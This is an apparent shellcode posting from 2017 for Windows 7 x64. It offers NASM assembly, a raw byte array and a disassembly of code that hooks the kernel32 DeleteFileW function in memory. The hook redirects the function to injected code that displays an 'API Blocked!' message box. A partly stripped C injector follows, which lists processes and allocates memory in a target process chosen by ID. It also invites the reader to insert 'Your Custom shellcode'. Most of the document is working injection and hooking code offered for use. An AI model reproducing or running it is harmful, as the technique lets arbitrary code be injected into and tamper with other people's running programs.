	# Title : Windows x64 API Hooking Shellcode
	# Author : Roziul Hasan Khan Shifat
	# Size : 117 bytes
	# Date : 16/10/2017
	# Email :
	# Tested On : Windows 7 Ultimate x64



This Shellcode hooks DeteleFileW() API
Warning: Do no Use this Shellcode on explorer.exe Otherwise You won't be able to delete file from Recycle Bin



section .text
	global _start

xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PPEB
mov rax,[rax+24] ;PPEB->Ldr
mov rsi,[rax+32] ;Ldr->InMemOrderModuleList.Flink
mov rax,[rsi]
mov rsi,[rax]

mov rdi,[rsi+32] ;rdi=kernel32.dll base Address

xor rsi,rsi
mov si,0x29f0
add rsi,rdi ;rsi=VirtualProtect()

;This Part is Important 

xor r12,r12
mov r12w,0xa2b0  ;0x0000a2b0 is Relative Address of DeleteFileW()
add r12,rdi ;r12=DeleteFileW()

;Changing memory attribute
mov rcx,r12
push rdx

mov dl,9

pop r8
mov r8b,0x40
sub rsp,4
lea r14,[rsp]
mov r9,r14
call rsi

mov [r12],byte 0xe9
jmp shellcode

pop rdx
sub rdx,r12
sub rdx,5
mov [r12+1],rdx

xor rdx,rdx
mov dl,9
mov rcx,r12
mov r8d,dword [r14]
mov r9,r14

call rsi
add rsp,4

call inj
;This is My own shellcode
db 0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48,0x8b,0x40,0x18,0x48,0x8b,0x70,0x20,0x48,0x8b,0x06,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x20,0x68,0x90,0x65,0x01,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xfb,0x52,0x52,0x48,0xb8,0x75,0x73,0x65,0x72,0x33,0x32,0x2e,0x64,0x48,0x89,0x04,0x24,0x66,0xc7,0x44,0x24,0x08,0x6c,0x6c,0x48,0x8d,0x0c,0x24,0x48,0x83,0xec,0x58,0xff,0xd3,0x68,0xb8,0x12,0x07,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xc3,0x48,0x31,0xc9,0x6a,0x10,0x41,0x59,0x51,0x51,0x48,0xba,0x41,0x50,0x49,0x20,0x42,0x6c,0x6f,0x63,0x48,0x89,0x14,0x24,0xc7,0x44,0x24,0x08,0x6b,0x65,0x64,0x21,0x48,0x8d,0x14,0x24,0x52,0x41,0x58,0x48,0x83,0xec,0x58,0x48,0x83,0xec,0x58,0xff,0xd3,0x90,0x48,0x31,0xd2,0x66,0xba,0x28,0x01,0x48,0x01,0xd4,0xc3



apiint.obj:     file format pe-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 31 d2             	xor    %rdx,%rdx
   3:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
   8:	48 8b 40 18          	mov    0x18(%rax),%rax
   c:	48 8b 70 20          	mov    0x20(%rax),%rsi
  10:	48 8b 06             	mov    (%rsi),%rax
  13:	48 8b 30             	mov    (%rax),%rsi
  16:	48 8b 7e 20          	mov    0x20(%rsi),%rdi
  1a:	48 31 f6             	xor    %rsi,%rsi
  1d:	66 be f0 29          	mov    $0x29f0,%si
  21:	48 01 fe             	add    %rdi,%rsi
  24:	4d 31 e4             	xor    %r12,%r12
  27:	66 41 bc b0 a2       	mov    $0xa2b0,%r12w
  2c:	49 01 fc             	add    %rdi,%r12
  2f:	4c 89 e1             	mov    %r12,%rcx
  32:	52                   	push   %rdx
  33:	b2 09                	mov    $0x9,%dl
  35:	41 58                	pop    %r8
  37:	41 b0 40             	mov    $0x40,%r8b
  3a:	48 83 ec 04          	sub    $0x4,%rsp
  3e:	4c 8d 34 24          	lea    (%rsp),%r14
  42:	4d 89 f1             	mov    %r14,%r9
  45:	ff d6                	callq  *%rsi
  47:	41 c6 04 24 e9       	movb   $0xe9,(%r12)
  4c:	eb 22                	jmp    70 <shellcode>

000000000000004e <inj>:
  4e:	5a                   	pop    %rdx
  4f:	4c 29 e2             	sub    %r12,%rdx
  52:	48 83 ea 05          	sub    $0x5,%rdx
  56:	49 89 54 24 01       	mov    %rdx,0x1(%r12)
  5b:	48 31 d2             	xor    %rdx,%rdx
  5e:	b2 09                	mov    $0x9,%dl
  60:	4c 89 e1             	mov    %r12,%rcx
  63:	45 8b 06             	mov    (%r14),%r8d
  66:	4d 89 f1             	mov    %r14,%r9
  69:	ff d6                	callq  *%rsi
  6b:	48 83 c4 04          	add    $0x4,%rsp
  6f:	c3                   	retq   

0000000000000070 <shellcode>:
  70:	e8 d9 ff ff ff       	callq  4e <inj>
  75:	48 31 d2             	xor    %rdx,%rdx
  78:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
  7d:	48 8b 40 18          	mov    0x18(%rax),%rax
  81:	48 8b 70 20          	mov    0x20(%rax),%rsi
  85:	48 8b 06             	mov    (%rsi),%rax
  88:	48 8b 30             	mov    (%rax),%rsi
  8b:	48 8b 7e 20          	mov    0x20(%rsi),%rdi
  8f:	68 90 65 01 0a       	pushq  $0xa016590
  94:	80 74 24 03 0a       	xorb   $0xa,0x3(%rsp)
  99:	5b                   	pop    %rbx
  9a:	48 01 fb             	add    %rdi,%rbx
  9d:	52                   	push   %rdx
  9e:	52                   	push   %rdx
  9f:	48 b8 75 73 65 72 33 	movabs $0x642e323372657375,%rax
  a6:	32 2e 64 
  a9:	48 89 04 24          	mov    %rax,(%rsp)
  ad:	66 c7 44 24 08 6c 6c 	movw   $0x6c6c,0x8(%rsp)
  b4:	48 8d 0c 24          	lea    (%rsp),%rcx
  b8:	48 83 ec 58          	sub    $0x58,%rsp
  bc:	ff d3                	callq  *%rbx
  be:	68 b8 12 07 0a       	pushq  $0xa0712b8
  c3:	80 74 24 03 0a       	xorb   $0xa,0x3(%rsp)
  c8:	5b                   	pop    %rbx
  c9:	48 01 c3             	add    %rax,%rbx
  cc:	48 31 c9             	xor    %rcx,%rcx
  cf:	6a 10                	pushq  $0x10
  d1:	41 59                	pop    %r9
  d3:	51                   	push   %rcx
  d4:	51                   	push   %rcx
  d5:	48 ba 41 50 49 20 42 	movabs $0x636f6c4220495041,%rdx
  dc:	6c 6f 63 
  df:	48 89 14 24          	mov    %rdx,(%rsp)
  e3:	c7 44 24 08 6b 65 64 	movl   $0x2164656b,0x8(%rsp)
  ea:	21 
  eb:	48 8d 14 24          	lea    (%rsp),%rdx
  ef:	52                   	push   %rdx
  f0:	41 58                	pop    %r8
  f2:	48 83 ec 58          	sub    $0x58,%rsp
  f6:	48 83 ec 58          	sub    $0x58,%rsp
  fa:	ff d3                	callq  *%rbx
  fc:	90                   	nop
  fd:	48 31 d2             	xor    %rdx,%rdx
 100:	66 ba 28 01          	mov    $0x128,%dx
 104:	48 01 d4             	add    %rdx,%rsp
 107:	c3                   	retq   



unsigned char shellcode[]=\

//Main Shellcode (Interceptor Shellcode)


//Your Custom shellcode 


int main()
	HANDLE snap,proc,mem;
	DWORD len,l,pid;
		printf("CreateToolhelp32Snapshot() Failed");
		return 0;
		printf("Process32First() Failed");
		return 0;
		printf("%s : %ld\n",ps.szExeFile,ps.th32ProcessID);
	printf("\nEnter Process ID: ");
		printf("Failed to Open Process");
		return 0;
		printf("Failed to allocate memory in process");
		return 0;
	return 0;